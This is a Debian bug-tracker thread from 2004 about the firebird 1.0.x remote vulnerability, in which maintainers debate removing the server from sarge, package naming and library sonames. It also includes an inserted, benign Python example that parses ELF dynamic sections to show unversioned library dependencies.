Information forwarded to debian-bugs-dist@lists.debian.org, Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Damyan Ivanov <divanov@creditreform.bg>:
Extra info received and forwarded to list. Copy sent to Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>. (full text, mbox, link).


Message #70 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Damyan Ivanov <divanov@creditreform.bg>
To: 251458@bugs.debian.org
Cc: vorlon@debian.org, ed@debian.org, nledez@virtual-net.fr
Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability
Date: Wed, 28 Jul 2004 16:14:40 +0300
[Message part 1 (text/plain, inline)]
Remco Seesink wrote:
>>>2. Not all applications will work out of the box from 1.0.x moving to
>>>   1.5.x
>>
>>Do you have in mind some example incompatibility? I don't think there is 
>>something fatal.
> 
> That could be true. I noticed ibconsole from IB6 doesn't work well with
> firebird 1.5. It is complaining the version is too *old*.
> 
> Also firebird 1.5 is more strict with sql and can trigger bugs
> not noticed in 1.0.x. Of course this is minor when developing, but can
> be a pain for people just deploying. An example I ran into: doing an order
> by in a select count(*) query is no longer allowed. (and shouldn't be)
> 
> There may be other issues.

You're right.
That's why putting 1.0.3 on debian.net is a good idea. Maybe a note (and 
security warning) in README.Debian of 1.5.x packages could be useful to 
point the desperate to 1.0.3 packages...

I for one plan to run our production server with 1.0.3 for some time... :-)



Thanks,
dam

-- 
Damyan Ivanov                             Creditreform Bulgaria
divanov@creditreform.bg             http://www.creditreform.bg/
phone: +359(2)928-2611, 929-3993           fax: +359(2)920-0994
mobile: +359-88-856-6067      ICQ: 3028500      Y!M: dam3028500
[signature.asc (application/pgp-signature, attachment)]

Information stored:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to "Daniel Urban" <daniel@sente.pl>:
Extra info received and filed, but not forwarded. (full text, mbox, link).


Message #75 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: "Daniel Urban" <daniel@sente.pl>
To: "Damyan Ivanov" <divanov@creditreform.bg>, <251458-quiet@bugs.debian.org>, <pkg-firebird-general@lists.alioth.debian.org>
Cc: "Steve Langasek" <vorlon@debian.org>, <251458-quiet@bugs.debian.org>, <ed@debian.org>, <nledez@virtual-net.fr>
Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability
Date: Wed, 28 Jul 2004 17:24:53 +0200
> 
> 
> > If this would happen I am not so sure about the usefulness of the
> > firebird2 naming.
> 
> Maybe we can rename it to firebird later, but I am not sure what 
> reflections a rename will have right now, before sarge release.
> 

I'm for renaming firebird2 to firebird.
Could we do it now? Greg? Would there be a problem with it now?

Best regards
Daniel Urban



Information stored:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to "Grzegorz B. Prokopski" <gadek@debian.org>:
Extra info received and filed, but not forwarded. (full text, mbox, link).


Message #80 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: "Grzegorz B. Prokopski" <gadek@debian.org>
To: Daniel Urban <daniel@sente.pl>, 251458-quiet@bugs.debian.org
Cc: Damyan Ivanov <divanov@creditreform.bg>, pkg-firebird-general@lists.alioth.debian.org, Steve Langasek <vorlon@debian.org>, ed@debian.org, nledez@virtual-net.fr
Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability
Date: Wed, 28 Jul 2004 13:36:48 -0400
On Wed, 2004-07-28 at 11:24, Daniel Urban wrote:
> > 
> > 
> > > If this would happen I am not so sure about the usefulness of the
> > > firebird2 naming.
> > 
> > Maybe we can rename it to firebird later, but I am not sure what 
> > reflections a rename will have right now, before sarge release.
> > 
> I'm for renaming firebird2 to firebird.
> Could we do it now? Greg? Would there be a problem with it now?

Yes, it would be.  But really, there's no point doing that.
Having it as a separate package gives us more flexibility:

* we would be able to push old fb into Sarge (i.e. with *big* security
warning and access allowed only from localhost, etc.) if we didn't
have fb2 in time (mind you, fb2 debs are NOT in testing yet and they
haven't had really wide testing as they only just hit unstable).

* we can still have old firebird packages around (i.e. in an unofficial
repository) and they would NOT be:
 - mistaken with firebird2 packages
 - auto-upgraded on standard system upgrade and overridden with 1.5.x
   version (otherwise you would need to keep them "on hold" which
   would make the automatic updates from unofficial repository
   impossible)

This is a common practice that you add a release number to the package
name when you want to keep the old version around for users that might
need it.  Just see the output of 'apt-cache search tk8'.

Cheers,

				GBP
-- 
Grzegorz B. Prokopski      <gadek@debian.org>
Debian GNU/Linux           http://www.debian.org
SableVM - LGPL'ed Java VM  http://www.sablevm.org
Why SableVM ?!?            http://devel.sablevm.org/wiki/Features




Information stored:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and filed, but not forwarded. (full text, mbox, link).


Message #85 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>
To: "Grzegorz B. Prokopski" <gadek@debian.org>
Cc: Daniel Urban <daniel@sente.pl>, 251458-quiet@bugs.debian.org, Damyan Ivanov <divanov@creditreform.bg>, pkg-firebird-general@lists.alioth.debian.org, ed@debian.org, nledez@virtual-net.fr
Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability
Date: Sat, 31 Jul 2004 02:42:41 -0700
[Message part 1 (text/plain, inline)]
On Wed, Jul 28, 2004 at 01:36:48PM -0400, Grzegorz B. Prokopski wrote:
> On Wed, 2004-07-28 at 11:24, Daniel Urban wrote:

> > > > If this would happen I am not so sure about the usefulness of the
> > > > firebird2 naming.

> > > Maybe we can rename it to firebird later, but I am not sure what 
> > > reflections a rename will have right now, before sarge release.

> > I'm for renaming firebird2 to firebird.
> > Could we do it now? Greg? Would be a problem with it now?

> Yes, it would be.  But really, there's no point doing that.
> Having it as a separate package gives us more flexibility:

> * we would be able to push old fb into Sarge (i.e. with *big* security
> warning and access allowed only from localhost, etc.) if we didn't
> have fb2 in time (mind you, fb2 debs are NOT in testing yet and they
> haven't had really wide testing as they only just hit unstable).

I'm sorry, but shipping a package with known exploitable security holes
in sarge is not an option.  If no one is able to fix the security
problems in the firebird server package (and I assume no one is, since
this bug has been open so long), then the firebird server package will
have to be removed from sarge -- along with all other binary packages
from the same source, as well as all other binary packages depending on
these packages.

> * we can still have old firebird packages around (i.e. in an unofficial
> repository) and they would NOT be:
>  - mistaken with firebird2 packages
>  - auto-upgraded on standard system upgrade and overridden with 1.5.x
>    version (otherwise you would need to keep them "on hold" which
>    would make the automatic updates from unofficial repository
>    impossible)

> This is a common practice that you add a release number to the package
> name when you want to keep the old version around for users that might
> need it.  Just see the output of 'apt-cache search tk8'.

I don't know that a comparison with a scripting language is the best
one, here.  And the value of helping users keep remotely-exploitable
software on their systems is definitely questionable.

I see from the latest firebird2 upload that the library packages now
provide: libfirebird and libfirebird2.  But the following is not
appropriate in *any* library package:

$ dpkg -c libfirebird2-classic_1.5.0-1_i386.deb |grep /usr/lib/libgds
lrwxrwxrwx root/root         0 2004-07-19 05:27:21 ./usr/lib/libgds.so -> libfbembed.so.1.5.0
$

I have checked php4-interbase, and confirmed that the soname this file
looks for is "libgds.so".  This means that there is no support
whatsoever for rebuilding software against a new version of libgds,
without breaking other programs that use the old version.  This is a
truly horrid setup, and I would strongly recommend that you rebuild all
of the firebird client packages prior to sarge's release so that they
will have a proper dependency on libfirebird2 and you can drop the
libgds.so symlink.

(BTW, where does the "2" in "libfirebird2" come from?  This is not the
soversion of either of the libraries contained in this package.)

-- 
Steve Langasek
postmodern programmer
[signature.asc (application/pgp-signature, inline)]

Information stored:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to "Grzegorz B. Prokopski" <gadek@debian.org>:
Extra info received and filed, but not forwarded. (full text, mbox, link).


Message #90 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: "Grzegorz B. Prokopski" <gadek@debian.org>
To: Steve Langasek <vorlon@debian.org>
Cc: Daniel Urban <daniel@sente.pl>, 251458-quiet@bugs.debian.org, Damyan Ivanov <divanov@creditreform.bg>, Debian Firebird Group <pkg-firebird-general@lists.alioth.debian.org>, ed@debian.org, nledez@virtual-net.fr
Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability
Date: Sat, 31 Jul 2004 12:43:16 -0400
In the message of Sat, 31-07-2004, 05:42, Steve Langasek writes: 
> On Wed, Jul 28, 2004 at 01:36:48PM -0400, Grzegorz B. Prokopski wrote:
> > On Wed, 2004-07-28 at 11:24, Daniel Urban wrote:
> 
> > > > > If this would happen I am not so sure about the usefulness of the
> > > > > firebird2 naming.
> 
> > > > Maybe we can rename it to firebird later, but I am not sure what 
> > > > reflections a rename will have right now, before sarge release.
> 
> > > I'm for renaming firebird2 to firebird.
> > > Could we do it now? Greg? Would there be a problem with it now?
> 
> > Yes, it would be.  But really, there's no point doing that.
> > Having it as a separate package gives us more flexibility:
> 
> > * we would be able to push old fb into Sarge (i.e. with *big* security
> > warning and access allowed only from localhost, etc.) if we didn't
> > have fb2 in time (mind you, fb2 debs are NOT in testing yet and they
> > haven't had really wide testing as they only just hit unstable).
> 
> I'm sorry, but shipping a package with known exploitable security holes
> in sarge is not an option.

In general - yes.  But given how and what firebird is used for - I dare
to disagree.  Firebird is not an ftp or http server to which the whole internet
has access.  Rather the opposite.  The usual usages can be i.e. running
an application on client workstations on local, trusted network, that
connect to separate machine which runs firebird.  Or you have a web
application (think: PHP) that often runs on the same host.

But please, I would NOT want to spend resources discussing it currently.
If everything goes fine, and so far it goes really well, we should have
firebird2 in Sarge and old firebird removed from testing/Sarge.  This
will automatically resolve all discussion about security of the old
firebird packages.

> If no one is able to fix the security
> problems in the firebird server package (and I assume no one is, since
> this bug has been open so long), then the firebird server package will
> have to be removed from sarge -- along with all other binary packages
> from the same source, as well as all other binary packages depending on
> these packages.

> > This is a common practice that you add a release number to the package
> > name when you want to keep the old version around for users that might
> > need it.  Just see the output of 'apt-cache search tk8'.
> 
> I don't know that a comparison with a scripting language is the best
> one, here.  And the value of helping users keep remotely-exploitable
> software on their systems is definitely questionable.
> 

I think you yourself suggested that we could simply package libraries
for firebird, not the (exploitable) server.  This is yet another reason
to package firebird2 separately.  Mind you that fb2 is not yet in
testing and even though Daniel did a marvelous job preparing these
packages and fixing every single problem that was reported - we cannot
yet be sure that the packages that will hit testing around monday
will not contain yet some problems.  Given that, it was much better
to package firebird 1.0.x and firebird2 separately as this gives us
much greater flexibility.  And we definitely want to have some form
of firebird available for Sarge and surely we don't want to remove
from Sarge all packages that need firebird libraries.

> I see from the latest firebird2 upload that the library packages now
> provide: libfirebird and libfirebird2.  But the following is not
> appropriate in *any* library package:
> 
> $ dpkg -c libfirebird2-classic_1.5.0-1_i386.deb |grep /usr/lib/libgds
> lrwxrwxrwx root/root         0 2004-07-19 05:27:21 ./usr/lib/libgds.so -> libfbembed.so.1.5.0
> $
> 
> I have checked php4-interbase, and confirmed that the soname this file
> looks for is "libgds.so".  This means that there is no support
> whatsoever for rebuilding software against a new version of libgds,
> without breaking other programs that use the old version.  This is a
> truly horrid setup, and I would strongly recommend that you rebuild all
> of the firebird client packages prior to sarge's release so that they
> will have a proper dependency on libfirebird2 and you can drop the
> libgds.so symlink.

I'll let the more knowledgeable people speak here, but AFAIR:
1. the library has rather stable API (for ex. applications that linked
against libgds.so coming from fb1 should work w/ libgds.so from fb2)
2. pretty much all existing applications expect libgds.so to exist
(even if I strongly agree this looks terrible) and they link against it.

Apparently upstream has done the first steps to remove this situation
by providing properly versioned library version and keeping the symlink
as backward compatibility option only.  But this will take a while
before developers will actually start using the versioned lib name.
I really don't think we should make using firebird in Sarge such painful
experience for our users.  Currently 99% of the software they might ever
want to compile against firebird libraries will look for the .so file
only.

> (BTW, where does the "2" in "libfirebird2" come from?  This is not the
> soversion of either of the libraries contained in this package.)

The goal of firebird 1.0.x was to get something usable from the original
interbase 6 beta code, while the "new" firebird was supposed to have
significant changes like usage of C++ and development of truly new
features.  Therefore the new firebird started to be referred to as
firebird2.  The 1.5 version is IIRC something in between.  Still
compatible with firebird 1.0.x series, but already containing all
the newest developments.  The 1.5 version might be viewed as something
like deep-pre-2.0.

Cheers,

				Grzegorz B. Prokopski

-- 
Grzegorz B. Prokopski      <gadek@debian.org>
Debian GNU/Linux           http://www.debian.org
SableVM - LGPL'ed Java VM  http://www.sablevm.org
Why SableVM ?!?            http://devel.sablevm.org/wiki/Features




Information stored:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and filed, but not forwarded. (full text, mbox, link).


Message #95 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>
To: "Grzegorz B. Prokopski" <gadek@debian.org>
Cc: Daniel Urban <daniel@sente.pl>, 251458-quiet@bugs.debian.org, Damyan Ivanov <divanov@creditreform.bg>, Debian Firebird Group <pkg-firebird-general@lists.alioth.debian.org>, ed@debian.org, nledez@virtual-net.fr
Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability
Date: Sat, 31 Jul 2004 16:34:11 -0700
[Message part 1 (text/plain, inline)]
On Sat, Jul 31, 2004 at 12:43:16PM -0400, Grzegorz B. Prokopski wrote:

> > I see from the latest firebird2 upload that the library packages now
> > provide: libfirebird and libfirebird2.  But the following is not
> > appropriate in *any* library package:

> > $ dpkg -c libfirebird2-classic_1.5.0-1_i386.deb |grep /usr/lib/libgds
> > lrwxrwxrwx root/root         0 2004-07-19 05:27:21 ./usr/lib/libgds.so -> libfbembed.so.1.5.0
> > $

> > I have checked php4-interbase, and confirmed that the soname this file
> > looks for is "libgds.so".  This means that there is no support
> > whatsoever for rebuilding software against a new version of libgds,
> > without breaking other programs that use the old version.  This is a
> > truly horrid setup, and I would strongly recommend that you rebuild all
> > of the firebird client packages prior to sarge's release so that they
> > will have a proper dependency on libfirebird2 and you can drop the
> > libgds.so symlink.
> 
> I'll let the more knowledgeable people speak here, but AFAIR:
> 1. the library has rather stable API (for ex. applications that linked
> against libgds.so coming from fb1 should work w/ libgds.so from fb2)
> 2. pretty much all existing applications expect libgds.so to exist
> (even if I strongly agree this looks terrible) and they link against it.
> 
> Apparently upstream has done the first steps to remove this situation
> by providing properly versioned library version and keeping the symlink
> as backward compatibility option only.  But this will take a while
> before developers will actually start using the versioned lib name.
> I really don't think we should make using firebird in Sarge such painful
> experience for our users.  Currently 99% of the software they might ever
> want to compile against firebird libraries will look for the .so file
> only.

If they are *compiling* software, then they install the dev package.
*All* applications that are being compiled look for only the .so file;
but a properly implemented shared library will provide a versioned
SONAME for use at runtime.

If they have pre-compiled applications that reference libgds.so, then of
course the symlink must be there.  Personally, I think it would be
better to include this symlink in a -compat package, however.

> > (BTW, where does the "2" in "libfirebird2" come from?  This is not the
> > soversion of either of the libraries contained in this package.)

> The goal of firebird 1.0.x was to get something usable from the original
> interbase 6 beta code, while the "new" firebird was supposed to have
> significant changes like usage of C++ and development of truly new
> features.  Therefore the new firebird started to be referred to as
> firebird2.  The 1.5 version is IIRC something in between.  Still
> compatible with firebird 1.0.x series, but already containing all
> the newest developments.  The 1.5 version might be viewed as something
> like deep-pre-2.0.

The names of library packages should be related to the soversion of the
libraries they contain, not to some upstream notion of the software's
version number.  What will you name these library packages when
libfbclient.so.2 is released?

-- 
Steve Langasek
postmodern programmer
[signature.asc (application/pgp-signature, inline)]
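
The check Steve describes in the two messages above (which soname a compiled module actually looks for at runtime, and why an unversioned `libgds.so` in its NEEDED list is a problem) can be reproduced without readelf by parsing the ELF dynamic section directly. The following is an added example written for this page, not code from the firebird packages or from any participant in the thread. It builds a constructed, minimal ELF64 object in memory (the file layout, the load address `BASE`, the function names `build_elf`, `dynamic_info` and `unversioned_needed`, and the library names in the sample are all assumptions of the example, not taken from a real binary) and then lists its DT_NEEDED and DT_SONAME entries the way `readelf -d` would, flagging any NEEDED entry that carries no `.so.N` version.

```python
import re
import struct

PT_LOAD, PT_DYNAMIC = 1, 2
DT_NULL, DT_NEEDED, DT_STRTAB, DT_STRSZ, DT_SONAME = 0, 1, 5, 10, 14
_EHDR = "<16sHHIQQQIHHHHHH"  # Elf64_Ehdr, little-endian
_PHDR = "<IIQQQQQQ"          # Elf64_Phdr
_DYN = "<qQ"                 # Elf64_Dyn: signed d_tag, unsigned d_val
_VERSIONED = re.compile(r"\.so\.\d+")
BASE = 0x10000  # assumed load address; non-zero so vaddr and file offset differ


def build_elf(soname, needed):
    """Construct a minimal ELF64 shared object: one PT_LOAD covering the
    whole file and one PT_DYNAMIC with NEEDED/SONAME/STRTAB entries.
    Constructed test input only; it carries no code and cannot be loaded."""
    strtab, offs = b"\0", {}
    for name in [soname] + list(needed):
        offs[name] = len(strtab)
        strtab += name.encode() + b"\0"
    ehdr_size, phdr_size = struct.calcsize(_EHDR), struct.calcsize(_PHDR)
    str_off = ehdr_size + 2 * phdr_size
    dyn_off = (str_off + len(strtab) + 7) & ~7          # 8-byte align .dynamic
    entries = [(DT_NEEDED, offs[n]) for n in needed]
    entries += [(DT_STRTAB, BASE + str_off), (DT_STRSZ, len(strtab)),
                (DT_SONAME, offs[soname]), (DT_NULL, 0)]
    dyn = b"".join(struct.pack(_DYN, t, v) for t, v in entries)
    total = dyn_off + len(dyn)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8   # ELFCLASS64, LSB
    ehdr = struct.pack(_EHDR, ident, 3, 62, 1, 0, ehdr_size, 0, 0,
                       ehdr_size, phdr_size, 2, 0, 0, 0)    # ET_DYN, x86-64
    load = struct.pack(_PHDR, PT_LOAD, 4, 0, BASE, BASE, total, total, 0x1000)
    dynamic = struct.pack(_PHDR, PT_DYNAMIC, 6, dyn_off, BASE + dyn_off,
                          BASE + dyn_off, len(dyn), len(dyn), 8)
    body = ehdr + load + dynamic + strtab
    return body + b"\0" * (dyn_off - len(body)) + dyn


def dynamic_info(elf):
    """Return {'soname': str|None, 'needed': [str]} from an ELF64 LSB object,
    i.e. what `readelf -d` prints as (SONAME) and (NEEDED)."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if elf[4] != 2 or elf[5] != 1:
        raise ValueError("only ELF64 little-endian is handled here")
    hdr = struct.unpack_from(_EHDR, elf, 0)
    e_phoff, e_phentsize, e_phnum = hdr[5], hdr[9], hdr[10]
    loads, dyn_seg = [], None
    for i in range(e_phnum):
        p_type, _, p_off, p_vaddr, _, p_filesz, _, _ = struct.unpack_from(
            _PHDR, elf, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD:
            loads.append((p_vaddr, p_off, p_filesz))
        elif p_type == PT_DYNAMIC:
            dyn_seg = (p_off, p_filesz)
    if dyn_seg is None:
        raise ValueError("no PT_DYNAMIC segment (statically linked?)")

    def to_offset(vaddr):  # d_val of DT_STRTAB is a virtual address
        for seg_vaddr, seg_off, seg_size in loads:
            if seg_vaddr <= vaddr < seg_vaddr + seg_size:
                return seg_off + (vaddr - seg_vaddr)
        raise ValueError("0x%x not backed by any PT_LOAD" % vaddr)

    tags, off, end = [], dyn_seg[0], dyn_seg[0] + dyn_seg[1]
    while off + 16 <= end:
        tag, val = struct.unpack_from(_DYN, elf, off)
        if tag == DT_NULL:
            break
        tags.append((tag, val))
        off += 16
    scalar = dict(tags)           # DT_NEEDED repeats; the others are unique
    if DT_STRTAB not in scalar or DT_STRSZ not in scalar:
        raise ValueError("dynamic section has no string table")
    str_off, str_sz = to_offset(scalar[DT_STRTAB]), scalar[DT_STRSZ]

    def name(idx):
        if idx >= str_sz:
            raise ValueError("string index outside .dynstr")
        stop = elf.index(b"\0", str_off + idx)
        return elf[str_off + idx:stop].decode("ascii", "replace")

    return {"soname": name(scalar[DT_SONAME]) if DT_SONAME in scalar else None,
            "needed": [name(v) for t, v in tags if t == DT_NEEDED]}


def unversioned_needed(info):
    """NEEDED entries with no '.so.N' version: these bind the consumer to a
    bare development name, which is the libgds.so situation from the thread."""
    return [n for n in info["needed"] if not _VERSIONED.search(n)]


if __name__ == "__main__":
    # Constructed stand-in for a php4-interbase-style module; the names are
    # assumptions of the example, not read from a real binary.
    sample = build_elf("libfbembed.so.1", ["libc.so.6", "libgds.so"])
    info = dynamic_info(sample)
    print("SONAME:", info["soname"])
    for n in info["needed"]:
        flag = " (unversioned!)" if n in unversioned_needed(info) else ""
        print("NEEDED:", n + flag)
```

The point the parser makes visible: at link time `ld` copies the library's DT_SONAME into the consumer's DT_NEEDED, and falls back to the name it was linked by when the library has no SONAME at all. A library that only ever exposes `libgds.so` therefore leaves every consumer recorded as needing `libgds.so`, so no versioned replacement can be installed alongside the old one, whereas a consumer built against a library with SONAME `libfbembed.so.1` records that versioned name even though it was linked via the plain `.so` from the dev package.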

Information stored:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to "Daniel Urban" <daniel@sente.pl>:
Extra info received and filed, but not forwarded. (full text, mbox, link).


Message #100 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: "Daniel Urban" <daniel@sente.pl>
To: "Steve Langasek" <vorlon@debian.org>, <251458-quiet@bugs.debian.org>
Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability
Date: Mon, 2 Aug 2004 08:27:08 +0200
Hi

> (BTW, where does the "2" in "libfirebird2" come from?  This is not the
> soversion of either of the libraries contained in this package.)

"Development on the Firebird 2 codebase began early in Firebird 1
development, with the porting of the Firebird 1 C code
(http://cvs.sourceforge.net/viewcvs.py/firebird/interbase/) to C++ and the
first major code-cleaning. Firebird 1.5 is the first release of the Firebird
2 codebase (http://cvs.sourceforge.net/viewcvs.py/firebird/firebird2/). It
is a significant milestone for the developers and the whole Firebird
project, but it is not an end in itself. As Firebird 1.5 goes to release,
major redevelopment continues toward the next point release on the journey
to Firebird 2."

With regards
Daniel Urban




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Remco Seesink <raseesink@hotpop.com>:
Extra info received and forwarded to list. Copy sent to Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>. (full text, mbox, link).


Message #105 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>
To: 255471@bugs.debian.org, 268931@bugs.debian.org, 251458@bugs.debian.org
Subject: Plan to get firebird, firebird2 and php4-interbase working in sarge.
Date: Thu, 2 Sep 2004 21:21:26 +0200
[Message part 1 (text/plain, inline)]
Hello,

Because of an unfixable security bug in the firebird 1.0.x (RC bug #251458)
firebird1 packages got removed from sarge. This triggered RC bug #268931.
php4-interbase could no longer be built since firebird-dev
was no longer available in sarge.

To solve this, php4-interbase was built against the newer firebird2 libs
which triggered RC bug #255471 and the newer package couldn't go into
sarge.

Firebird1 is now considered obsolete.

To get out of this mess for sarge I am packaging firebird1 libs without
the server so the current linking situation in sarge which has been tested
for a long time can be kept. That is php4-interbase (4.3.6-1) linked against
libfirebird1. This works with the new version of firebird and has an added
bonus of being backwards compatible with unofficial 1.0.x firebird packages.

This will solve all bugs #251458, #268931 and #255471. 

php4-interbase 4.3.8 packages in unstable will be rebuilt against libfirebird1
instead of libfirebird2 and when they really look stable be allowed in sarge
if we didn't freeze by then.

After sarge a more permanent solution for the problem can be worked out and
the firebird1 packages can then be dropped.

Cheers,
Remco.
[Message part 2 (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Damyan Ivanov <divanov@creditreform.bg>:
Extra info received and forwarded to list. Copy sent to Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>. (full text, mbox, link).


Message #110 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Damyan Ivanov <divanov@creditreform.bg>
To: Remco Seesink <raseesink@hotpop.com>, 251458@bugs.debian.org
Subject: Re: [Pkg-firebird-general] Bug#251458: Plan to get firebird, firebird2 and php4-interbase working in sarge.
Date: Fri, 03 Sep 2004 10:53:38 +0300
[Message part 1 (text/plain, inline)]
Remco Seesink wrote:
> To get out of this mess for sarge I am packaging firebird1 libs without
> the server so the current linking situation in sarge which has been tested
> for a long time can be kept. That is php4-interbase (4.3.6-1) linked against
> libfirebird1. This works with the new version of firebird and has an added
> bonus of being backwards compatible with unofficial 1.0.x firebird packages.
> 
> This will solve all bugs #251458, #268931 and #255471. 

Can libfirebird1 co-exist with libfirebird2-* ? My impression was that 
libfirebird2-* replace/provide/conflict with libfirebird1. If I am 
correct, php4-interbase 4.3.6 would be uninstallable if libfirebird2-* 
is installed. I see that in this case php4-interbase will be 
uninstallable only on systems with firebird2-server installed. If your 
server is on one machine, and your web server - on another this shall be 
no problem. For development, however, it is not uncommon to put 
everything on one machine - firebird2-server (with libfirebird2) and 
apache (with php4-interbase).

On the other side, you may have in mind only build-depends on 
libfirebird1 and depends on libfirebird (generic, provided by both 
libfirebird1 and libfirebird2), in which case things may actually work :-)

> php4-interbase 4.3.8 packages in unstable will be rebuild against libfirebird1
> instead of libfirebird2 and when they really look stable be allowed in sarge
> if we didn't freeze by then.

> After sarge a more permanent solution for the problem can be worked out and
> the firebird1 packages can then be dropped.

Can the alternative system be used for this? I.e. we have two 
alternatives for libfirebird2 - "-classic" and "-super". They can't both 
be installed simultaneously, and they both provide the same API.

So php4-interbase can depend (and build-depend) on libfirebird2, which 
is provided by either libfirebird2-classic or libfirebird2-super.

The key point is to make php4-interbase link against the "alternative 
alias". Currently, 3.6.1 is linked against libgds (provided by 
libfirebird1), which became a compatibility symlink in libfirebird2. 
This is just fine, but I can't imagine how to do it when building 
against libfirebird2 :-|

I am not sure if "alternative" has to be replaced with "diversion" 
above. I am not fluent with both alternative and diversion systems.


Hope this gives some food for thought.


dam

-- 
Damyan Ivanov                             Creditreform Bulgaria
divanov@creditreform.bg             http://www.creditreform.bg/
phone: +359(2)928-2611, 929-3993           fax: +359(2)920-0994
mobile: +359-88-856-6067      ICQ: 3028500      Y!M: dam3028500
[signature.asc (application/pgp-signature, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>:
Bug#251458; Package firebird. (full text, mbox, link).


Acknowledgement sent to Damyan Ivanov <divanov@creditreform.bg>:
Extra info received and forwarded to list. Copy sent to Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>. (full text, mbox, link).


Message #115 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Damyan Ivanov <divanov@creditreform.bg>
To: Damyan Ivanov <divanov@creditreform.bg>, 251458@bugs.debian.org
Cc: Remco Seesink <raseesink@hotpop.com>
Subject: Re: Bug#251458: [Pkg-firebird-general] Bug#251458: Plan to get firebird, firebird2 and php4-interbase working in sarge.
Date: Fri, 03 Sep 2004 13:11:34 +0300
[Message part 1 (text/plain, inline)]
Hi, Remco,

I am thinking about the long term solution... and the best thing I've 
come up with is:

in libfirebird2-classic:

rename the library to libfirebird2-classic (with all the .0, .so.0's) 
and provide *hardlinks* named libfirebird2 (with all the .0 and .so.0's)

in libfirebird2-super:

rename the library to libfirebird2-super (ditto for .0 and .so.0's)
and provide *hardlinks* named libfirebird2 (ditto)

libfirebird2-* should conflict with each other and provide libfirebird2.

This way, any package compiled against either of them will link against 
libfirebird2, not against libfb(client|embed)

Now that I write this, I am wondering, ain't it possible to rename the 
library to libfirebird2 in both packages? This way there will be no need 
of any ugly hardlinks.

All packages, depending on libfirebird2-* must be recompiled, of course, 
and made to link with libfirebird2. These are firebird2-server-* and 
php4-interbase. All three of these are yours, so there's no need to 
bother other maintainers :-)

Also, php4-interbase can build-depend and depend just on libfirebird2 
(provided by -classic and -super).


What do you think?


dam

-- 
Damyan Ivanov                             Creditreform Bulgaria
divanov@creditreform.bg             http://www.creditreform.bg/
phone: +359(2)928-2611, 929-3993           fax: +359(2)920-0994
mobile: +359-88-856-6067      ICQ: 3028500      Y!M: dam3028500
[signature.asc (application/pgp-signature, attachment)]

Reply sent to Remco Seesink <raseesink@hotpop.com>:
You have taken responsibility. (full text, mbox, link).


Notification sent to Remco Seesink <raseesink@hotpop.com>:
Bug acknowledged by developer. (full text, mbox, link).


Message #120 received at 251458-close@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>
To: 251458-close@bugs.debian.org
Subject: Bug#251458: fixed in firebird 1.0.3-2
Date: Mon, 06 Sep 2004 11:32:38 -0400
Source: firebird
Source-Version: 1.0.3-2

We believe that the bug you reported is fixed in the latest version of
firebird, which is due to be installed in the Debian FTP archive:

firebird-dev_1.0.3-2_i386.deb
  to pool/main/f/firebird/firebird-dev_1.0.3-2_i386.deb
firebird_1.0.3-2.diff.gz
  to pool/main/f/firebird/firebird_1.0.3-2.diff.gz
firebird_1.0.3-2.dsc
  to pool/main/f/firebird/firebird_1.0.3-2.dsc
libfirebird-c32_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-c32_1.0.3-2_i386.deb
libfirebird-c64_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-c64_1.0.3-2_i386.deb
libfirebird-s32_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-s32_1.0.3-2_i386.deb
libfirebird-s64_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-s64_1.0.3-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
